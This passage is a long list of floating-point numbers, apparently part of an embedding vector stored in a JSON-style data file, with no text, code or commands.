.0064497017,0.0047351504,-0.0007688255,-0.0014040839,-0.0038390746,0.006057888,0.0029993718,-0.027848842,-0.01055722,0.00008686564,0.0134930285,0.01694063,-0.014825825,0.00938928,-0.0165371,0.020889094,0.012414794,-0.02320109,0.005179651,0.008364297,-0.031149508,0.00513998,-0.0063809115,0.0059302854,-0.008958287,-0.004053844,-0.021048242,-0.0015231752,0.01942412,0.0014871444,0.025084065,0.0063576982,-0.008257293,0.0015846015,0.0025958077,-0.009721735,0.010069057,0.024029499,-0.04238993,-0.019869026,-0.018567173,0.04716491,-0.00012926853,-0.00034932356,0.0139464075,0.027844619,0.025562106,0.00020138227,0.0037942575,-0.0032264816,0.0021380028,-0.0115905665,-0.041980676,-0.012855553,0.0076311585,-0.004354432,-0.023350509,0.007702114,0.013998152,-0.024072457,-0.014309267,-0.007590142,0.01894797,-0.004588259,-0.016330283,-0.008347934,-0.025582356,-0.012708495,0.007875055,-0.019416729,-0.000413868,-0.015561006,-0.011283287,0.00014004353,0.007823626,0.02546648,-0.015928486,0.00079540367,-0.00067325984,-0.0045741303,0.00027839787,0.01872871,0.0022761072,-0.0031013982,-0.00020828994,-0.0029968794,-0.004569505,0.020347081,-0.011468433,-0.004133692,0.021747937,-0.009486138,0.023034997,-0.0034865532,0.011194297,0.02493228,-0.006775076,-0.002295217,-0.005032474,0.0070257606,0.0149302455,-0.005417276,-0.028620025,-0.010536021,0.006208885,0.018824259,0.027400263,0.011400598,-0.019459838,-0.0039817006,0.02697754,-0.017440217,0.049525715,-0.0041183513,0.0072549405,-0.009430261,-0.0030696252,0.010964334,-0.018749533,0.007860329,0.011737962,-0.023673855,-0.009153826,0.00083675684,-0.0008397883,0.0013015805,0.0066349306,-0.006707392,-0.014637729,-0.017294202,0.0036381262,0.0119064925,-0.01536366,-0.014966303,0.016187528,-0.0033720464,-0.013083484,0.002741445,0.022275545,0.012033215,-0.024975386,-0.015898634,-0.011574736,0.014076983,-0.005507743,-0.010037713,-0.005249691,-0.09625396,0.0135819875,-0.044351216,0.010754354,-0.0012375662,-0.010031331,-0.0034820705,0.07372763,-0.002991174,-0.038576387,0.0020589777,0.02574998,0.012344122,0.03565669,0.02698251,0.002305507,-0.017093893,0.0036049443,-0.018893462,-0.0006063862,0.016291143,-0.006906549,-0.01367075,-0.0038230792,-0.007836328,0.022119349,-0.026369534,0.010926622,0.026105234,0.03627209,-0.009673523,0.020631116,-0.0029620703,-0.003719463,0.009775938,0.00022788257,-0.024930634,0.009531022,-0.005894014,-0.010283272,-0.0014796206,0.005604568,-0.008368183,0.0051892325,-0.006581465,0.010921934,0.0030814237,0.015805257,0.017296636,0.0075101997,0.006983482,-0.009518155,0.027372103,-0.020413341,0.0010111161,0.003874952,-0.019821776,0.010039962,-0.009872121,-0.0006701839,0.007995756,0.039889894,-0.0019225518,-0.0068635107,0.00076415023,-0.0027750975,0.008907905,-0.00711816,0.0070369844,-0.01435638,-0.0004901115,0.008234549,-0.010769701,-0.007331525,-0.0050732703,-0.0012958595,0.010077066,0.028371938,0.0026749137,0.0023073908,-0.0039596623,0.0041473215,0.008012302,0.0089415675,0.009184635,-0.00079028745,0.0021364207,0.0067842808,-0.020044966,-0.020487068,-0.0047487654,0.01553016,-0.01919837,-0.0014302969,-0.0070376964,0.004125061,-0.0021984277,0.039850213,0.027072776,-0.017439893,0.006706136,-0.0026684653,-0.0073049827,-0.0064164903,-0.12081941,-0.034668714,0.015800888,0.0051736296,-0.013678843,-0.021100694,-0.018901465,0.0027268624,-0.0054172906,-0.01727107,-0.021930017,0.010078966,0.025051089,-0.012085708,0.01808327,-0.0092686545,-0.025434727,0.028947974,0.0024305836,-0.022150457,0.014447685,0.014982226,-0.035487227,-0.012676262,0.0008205882,-0.012983958,0.012753925,0.011579701,0.0035520154,0.0049806186,0.00028359724,0.020064441,-0.038323797,-0.0074662054,0.018743994,-0.00752142,0.012497655,0.0013892951,0.0073604323,0.026028458,0.001456288,-0.015919367,0.002702672,0.01256051,0.016685488,0.018600902,-0.004175124,0.0069754473,0.011503242,0.013488899,0.0051344144,0.014043513,-0.00281194,0.004869092,0.031671353,0.0034208247,-0.02629845,0.0020280194,-0.028464317,0.0071625425,-0.00961596,0.010416448,-0.004582613,-0.005385154,-0.010206032,0.028555464,0.0046379943,0.008406124,0.024225514,-0.0037246558,-0.012648457,0.0093497215,0.021739755,-0.0047762324,-0.00490802,0.017243607,0.014619895,0.020030001,0.028252866,-0.001592731,-0.023028605,0.011928378,-0.016554825,0.019622494,-0.014282024,0.006571361,0.0073766545,0.02133189,-0.011837067,0.035816886,-0.020903006,0.026423221,-0.015215229,0.0015963692,0.008764742,-0.0060950634,0.0062832134,0.020991683,-0.018931715,0.009093213,-0.04248867,-0.01976109,-0.0026995314,0.0159664,-0.012273731,0.007018434,-0.018430945,0.007355231,-0.01426593,0.0071829944,0.015206556,0.014632029,-0.006959555,0.025700124,-0.0030002047,-0.003526243,-0.007124428,0.007738389,-0.02420174,0.04669706,-0.0076586427,0.014338544,0.006072359,-0.022243982,-0.018016787,0.00018231363,-0.015782654,0.025722513,0.015753958,-0.027956955,0.002814339,0.006371838,0.02978119,-0.031715047,-0.030665595,0.0076033245,0.002487983,-0.006947303,0.018425325,0.008662058,-0.019067936,0.0042360127,0.013940091,-0.002289817,-0.011457106,-0.016671192,0.00473057,-0.001291873,0.004884577,0.012227781,-0.014523137,-0.0013007482,0.03475633,0.016652854,-0.0132748075,0.0053274767,-0.01351415,0.006287251,0.0029085975,0.0015671599,0.014699506,0.017409258,0.020554224,-0.00019137605,0.0021875447,-0.008668763,0.002583527,-0.017142534,0.008831154,-0.0013322014,-0.0053237015,-0.008590585,-0.016757907,0.022866426,0.02405938,0.015489315,0.013737044,0.020828411,0.002790085,0.013089447,0.026420932,0.02146377,-0.034860164,0.00581096,0.014292446,0.00073653035,-0.02279596,-0.018424498,-0.013110487,0.012200896,0.005878741,0.009619947,-0.018164326,0.011035682,0.019403676,-0.029367814,-0.009461109,0.01784801,0.020690331,-0.024173174,-0.014547551,0.014909507,-0.004521904,-0.01686435,-0.02186749,0.01635925,0.0038303009,0.014890148,0.024857193,-0.015423478,-0.013818956,-0.02767979,0.0073202588,0.016440608,0.014001423,0.013910239,-0.017353483,-0.0052293655,0.01130966,-0.014986712,-0.0061400537,-0.002934141,0.0035529933,-0.027026556,-0.0075363046,0.016957153,0.00067204126,0.026381778,0.016320065,0.016006444,0.009261993,-0.012741156,-0.0026471948,0.020235768,0.019852813,0.007633798,0.02385034,-0.011622691,0.008826008,-0.016989194,-0.018003508,0.01925415,0.024092393,0.011045155,-0.0035435718,-0.0126416795,0.042889133,-0.0018989661,0.00064648484,0.011664536,0.01241833,-0.01248402,-0.0020741327,0.003359811,-0.019499643,-0.015071352,0.012547275,0.0006951305,-0.025491003,0.010239515,-0.041976906,-0.018055905,0.0113199325,0.02287318,-0.01091044,0.0016397786,0.0050888285,-0.024863187,-0.0007718423,-0.0063701835,-0.016048819,0.024760015,0.011625329,0.017362833,0.0328648,-0.0012304706,0.00675704,-0.019023694,-0.0027955945,0.016920615,-0.0063400776,-0.021757027,-0.0033618242,-0.0017771587,0.006532182,0.007920931,-0.023150325,-0.011022936,0.010182962,-0.008958696,0.00020597645,0.021610431,-0.0014879094,-0.012747762,-0.019758323,0.0033373602,0.03509125,-0.017261276,-0.007388715,-0.012029084,0.0013888094,0.008905308,0.0060152723,-0.0012219603,-0.011780677,-0.02857647,0.00038421518,0.02024287,-0.0015017919,-0.011796185,-0.0037243634,-0.0076995073,-0.0055306572,0.022638457,0.005358744,-0.01754728,-0.03604221,-0.012030362,-0.010145917,-0.0023588636,-0.011986471,-0.05007988,0.005918676,-0.0101132905,0.024766995,0.0048513426,0.0041239318,0.002090566,0.02618868,0.0063965674,0.02837883,-0.014270819,-0.0155809475,-0.023119902,0.012013124,-0.0025400827,-0.007863474,0.022478638,0.0116991615,0.018707557,0.010772481,0.010274305,-0.03271275,-0.03384839,-0.017851457,-0.014323929,-0.009154822,-0.0073822206,0.023728136,0.003832517,-0.028442675,0.0042580594,-0.00088682433,0.03728722,0.004804867,-0.021076538,-0.013695917,-0.020274159,-0.0141522605,0.00320188,-0.017867945,0.0016691352,0.029104771,-0.012403267,0.010538764,0.017844051,-0.0033138748,-0.0018283422,-0.01548308,-0.015133748,-0.026686562,-0.018838182,-0.024562947,-0.023618745,-0.0031053994,-0.06874421,0.004077714,0.01823807,-0.023554945,0.015661744,-0.00082372106,-0.033452798,-0.005843691,0.015023639,-0.007091584,-0.0026909274,-0.014071771,-0.010028556,-0.0059378706,-0.009737697,-0.015618864,0.0026261564,0.011969454,0.015235633,-0.010048082,-0.03317493,0.037629742,-0.0018250487,-0.009576679,0.032750394,0.0005140083,-0.0150425555,0.011277179,-0.014108897,0.027088413,0.0019059142,-0.01472245,-0.012943222,-0.019623822,0.005389,-0.013461265,-0.008452292,0.008012915,0.007301405,-0.032286994,0.022061236,0.013619573,0.003599379,0.009712445,0.0010644994,0.01764286,-0.009417033,-0.0129089225,-0.02903185,0.006238806,0.0057525644,0.000084102445,-0.011739219,0.033555746,-0.00308181,0.0034955877,0.010340958,-0.0011563558,0.03172392,0.0031632069,0.01268225,-0.0075531974,0.028044114,0.0034014357,-0.007630399,0.034331325,-0.012955867,0.020233566,-0.012352002,0.00068378454,0.00802531,-0.01046488,-0.01929391,-0.01707944,-0.010519314,0.009274053,-0.014538736,-0.027943224,0.0035422726,0.015284947,0.016575385,-0.014583098,-0.005803351,-0.00822713,0.019905578,0.004611426,-0.015187262,0.012466722,0.018157432,0.022926867,-0.005384983,-0.008393993,-0.0059806663,-0.023524053,-0.015089494,0.016317688,-0.004537382,-0.015294085,0.0028635806,0.0061910297,-0.022965359,-0.0010880835,0.0074893306,0.00029945595,0.026636401,-0.008410964,0.006649426,0.006738393,-0.0046776207,0.007498882,-0.003279174,0.013639386,0.05210952,0.0026296775,0.014341014,-0.010605253,-0.01674324,0.010445588,-0.017869642,0.011593384,-0.03871054,-0.04145745,-0.011431429,-0.01525216,-0.009697759,0.015949918,0.00048978184,-0.016735593,-0.010242915,0.015315825,-0.01198542,0.017713275,0.027503934,0.024936797,0.009191076,0.021201942,0.024162816,-0.019692276,-0.013744292,0.018427571,0.016080476,-0.041039553,-0.0033758834,-0.0022760392,-0.012949211,0.04721736,-0.0052124895,-0.012248134,-0.0011970288,-0.018493956,-0.013180373,-0.0020957098,0.0070370277,0.002171515,-0.015130002,0.004249858,0.027560452,-0.00208791,-0.013590397,-0.020468144,0.0071253483,-0.001406904,0.013203075,-0.015388055,-0.010389117,0.00736658,0.015549565,0.00063813484,0.00086088147,-0.03898409,-0.024955539,-0.010519707,0.004180127,-0.005928019,-0.012935092,0.03684272,0.014949918,0.01949876,-0.017163288,0.022439022,0.0040756003,0.010656451,-0.00041197843,-0.004807784,-0.012002197,0.0017810692,-0.00620554,-0.015453104,-0.007990024,-0.025147252,-0.002488723,0.0023535122,0.01363515,0.011940751,-0.024033533,-0.009773031,-0.0021391585,-0.0193912,0.008215684,0.0018785836,-0.011117708,0.0035642418,-0.0011421276,0.002701744,-0.004095248,0.02546902,0.0019079073,0.012854522,-0.0055886093,0.02480482,0.019169599,0.008226965,-0.0031824105,0.06945538,-0.0007096441,0.016629266,0.00068833824,0.013429859,-0.0012597226,0.014145869,-0.0005695296,0.013864354,-0.009948829,-0.00046869085,0.00047694184,0.0007543933,-0.009187662,-0.018716807,0.01831089,0.02514231,0.0038934783,-0.016874827,-0.024458667,0.0031789597,-0.020069627,0.0039709397,0.009240291,0.012984794,-0.04463956,0.01476336,0.026249416,-0.000018758526,0.0126746055,0.009221246,0.01558848,0.00043353654,-0.0015548393,-0.003318921,0.00044554292,0.006415949,-0.018032415,-0.0025632977,-0.023842579,-0.0063537327,0.013826718,-0.0028356442,0.0068876594,-0.029388616,0.009205541,0.0028955662,0.001874352,0.011900881,0.0037896854,0.01851014,0.017693384,0.020439286,0.0065027615,0.017098472,0.002526023,0.00087696436,-0.0058352854,0.00173349,0.0006297352,0.024320235,-0.011194047,-0.011253191,0.016013997,0.022666896,0.013745009,-0.006559406,0.00004580172,-0.03297995,-0.027281541,0.029659407,-0.0155712,-0.024919922,0.0119781345,-0.015058116,0.012477149,-0.010214665,-0.013341384,0.00023838104,-0.009933836,0.00052836235,0.017620116,-0.029770559,-0.016409397,-0.023238625,0.017536646,-0.018205857,0.0146125965,0.0025479638,-0.0021821044,0.017607445,0.0061271777,-0.0070569715,-0.00029469107,0.01106168,-0.0039604553,0.034166403,-0.01770524,-0.003376778,0.0027562524,0.010567643,0.0019798514,-0.014449792,0.004513847,-0.013154879,-0.010923107,0.001945916,0.014259691,0.013180181,0.021969002,0.01955117,0.011303052,0.009786417,-0.002198456,-0.015991755,-0.028561564,-0.00078691274,-0.00962903,0.0019860151,-0.012292705,-0.0044624223,0.01957637,0.0002647575,-0.0007668909,-0.0063654655,0.01811593,0.011578343,0.029830338,0.0017082602,-0.005114397,-0.008706204,-0.034152474,-0.045472864,0.009328073,0.0027974136,0.016784506,0.021487895,0.013856383,-0.018811408,-0.003990006,0.016347684,0.009412549,0.00036562016,0.0028370244,-0.0009674555,-0.01650213,0.033491235,-0.027911182,-0.005038126,0.007913066,0.0067001106,-0.0031157963,-0.0013938539,0.0037250305,0.00903409,-0.009680547,0.007897551,-0.02215439,-0.004472877,-0.023640621,0.0060384534,0.007050156,-0.018914465,-0.040539987,0.012200369,0.0015356633,0.013531744,-0.011886813,-0.008772996,-0.012314104,-0.017641995,-0.00475398,-0.004965511,0.01551129,-0.0001104128,-0.012819771,-0.012764828,0.008727439,-0.016653726,-0.003272874,0.025259594,-0.0055567822,-0.004950216,0.020973602,-0.0039891237,0.0054231845,-0.022139557,0.008891806,0.0024283864,0.06225884,-0.012577462,0.01153783,-0.009480981,0.0035515616,0.03472678,-0.006978616,-0.026176153,0.03779999,-0.0280396,-0.044856798,0.012053982,0.0018921476,-0.011006499,0.017939359,0.012743363,-0.017621264,0.00043844982,-0.009935999,-0.017437495,0.011702659,-0.002009947,0.007078084,0.003534607,-0.023328668,0.009038547,-0.011905403,-0.025594177,-0.009821931,-0.01528339,-0.0025681762,-0.02203695,-0.015837446,-0.015577991,0.0022208926,-0.023928333,-0.03221066,0.013056168,0.02027883,0.0150430035,0.0019524081,-0.005911403,0.007115023,-0.023336276,0.006870372,-0.012210165,-0.0010442069,0.034070708,0.009604558,-0.0069045983,-0.0011145781,-0.0053222384,0.006060308,-0.010198216,0.013742153,-0.00501401,-0.010729197,-0.013333143,-0.00075932016,-0.009583958,-0.028462628,-0.0060133925,0.029927563,-0.033595707,-0.020533495,-0.021319201,-0.003141382,-0.020892186,-0.0070506837,0.010932497,-0.017966213,-0.012303025,0.0011491509,0.000785139,0.0036849806,-0.003357235,-0.013399278,0.0029990394,-0.010981061,-0.0091807945,-0.010026426,-0.014996653,-0.010301048,-0.021349004,-0.016019179,-0.019760964,0.013365656,-0.020809416,-0.0047650924,-0.0029623297,0.019686265,0.0073375753,-0.019433586,0.028736208,-0.026912866,-0.0042000255,0.017795492,0.029051801,0.016119752,0.031557053,-0.010308142,0.010058217,0.035012767,-0.023880968,-0.028260794,0.007305735,-0.024905939,-0.087517224,-0.018507728,0.02393524,0.004591399,-0.04467381,-0.0016272954,-0.0010043537,0.004763742,-0.0029574577,0.0096769715,-0.004670672,0.00003577326,-0.016604498,0.045914534,-0.0011206376,0.0010679902,0.01708441,-0.008278666,0.0097688325,-0.006143068,-0.0006022995,0.008442024,0.013312604,0.005217008,0.00041875077,-0.006551995,-0.003958816,0.036109697,0.010188918,-0.009146446,0.018913848,-0.03327289,-0.012794022,-0.033388823,0.002525142,-0.005860049,0.005488586,-0.0015209873,0.017953185,-0.025346622,-0.0057718013,0.14213575,-0.0045628548,0.0013087204,-0.011233806,0.017616935,-0.012703703,0.0002052737,0.0016961903,0.0046079387,0.018806165,-0.0047001136,-0.02153849,-0.020892965,-0.010269472,0.011819178,-0.011028578,0.007154762,0.16628122,-0.0022711677,-0.015442932,0.01785359,0.013531217,0.016608005,0.020319609,-0.012992488,-0.06458892,0.030494275,-0.009588029,0.02542982,0.01478649,-0.005008318,0.0010542701,-0.008040549,-0.006299595,0.01340798,0.00931739,-0.008789618,-0.014472324,-0.045990545,-0.0022525485,0.00893189,-0.0004374202,-0.004163992,0.011217969,0.016137179,0.001784475,-0.0066013657,-0.0073573017,0.009005853,0.035254523,0.0049971,-0.012335793,0.010930305,-0.014371374,-0.0019109693,0.023836311,-0.01193805,0.032049954,-0.031198915,0.0026973637,-0.0030699458,-0.0021682037,-0.019485962,0.008794345,-0.0036382636,0.008647261,-0.010956989,-0.023563989,-0.0052654725,0.004022387,0.0044414424,0.0078163855,-0.008976371,-0.00848691,-0.013632758,0.009403311,-0.0053829346,-0.0077690333,0.0070351944,-0.0064054113,-0.007345271,0.018527335,-0.006930092,0.0024270099,-0.0034840163,-0.005912854,-0.0014236902,0.010088498,0.008178241,-0.022690048,-0.023595702,-0.0042159576,0.015046104,-0.01021033,0.0034056006,0.012689156,-0.0068928087,0.0033677192,0.0011739044,-0.020438217,0.004964603,0.023168921,0.0020839877,-0.0006240296,0.00029414357,-0.0029022337,0.0033514283,0.0055718967,-0.003255304,0.0068709813,-0.0030808854,0.006797855,-0.0124263195,0.012816214,-0.009564209,-0.008480866,-0.003091005,0.03290497,-0.010400343,-0.0039003878,-0.014518847,-0.017100176,0.011780892,0.014434913,-0.023621,-0.005790159,-0.0006125329,0.03584527,-0.012880348,0.008860705,-0.010353074,0.0099307075,-0.0067465114,-0.0055483878,0.036163878,0.0032104333,0.004327757,-0.008512512,-0.033815257,-0.020052435,-0.0044639497,0.010996034,-0.005004483,0.01769576,-0.0003246115,0.007745908,0.011242026,-0.0015987629]]}